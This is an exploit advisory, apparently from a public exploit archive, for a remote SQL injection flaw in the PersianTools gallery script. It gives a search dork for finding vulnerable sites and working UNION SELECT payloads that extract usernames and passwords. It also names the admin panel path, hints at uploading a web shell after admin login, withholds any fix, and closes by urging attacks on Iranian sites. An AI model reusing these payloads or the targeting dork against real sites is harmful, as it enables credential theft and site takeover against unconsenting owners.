Persian Tools Gallery suffers from a remote SQL injection vulnerability.
46847f307fec9604cdfc2ffebc3197c5f7375dae47d4e81b0290f93081c75787
========== \
============
== == == =
== == == =
============ == == =
============ ==== =
== ==== =
== ====== == == ====== =======
============ = = == == = = = =
\ ========= ======== == == ======== =======
=If you are muslim you will NEVER walk alone because ALLAH will be with you=
>>> Author:Sakab
>>> My email: Sakab12345@hotmail.com
>>> My Sites: www.iq-ty.com & www.tryag.com
>>> Date:9/10/1429 >>> Islamic calender :P
>>> Script:PersianTools gallery
>>> Dork:inurl:"gallery.php?catid="
>>> type :Remote SQL Injection Vulnerability
>>> Note: if you login as an admin you may upload a shell from the control panel
do not ask how !! use your mind ;)
>>> Exploite:
http://www.iq-ty.com/gallery.php?catid=[SQL]
>>> Examples:
http://www.iq-ty.com/gallery.php?catid=-24 union all select 1,username,password,4,5,6 from user--
http://www.iq-ty.com/gallery.php?catid=-24 union all select 1,concat(database(),char(58),user()),3,4,5,6 from user--
>>> Control panel path: http://www.iq-ty.com/admin/index.php
>>> Solution: I will never give it to you :P
++++++++++++++++++++++++++++++++
================================
GreeTz >>>>>>>>>>>>>>>>>>>>>>>>>
=======================================
My best friend: Hussain x
All KSA hackers and all Muslim hackers
All members of www.iq-ty.com & www.tryag.com
+++++++++++++++++++++++++++++++++++++++
NOTE: Now you can FUCK Iran sites ...... Can you ?! :)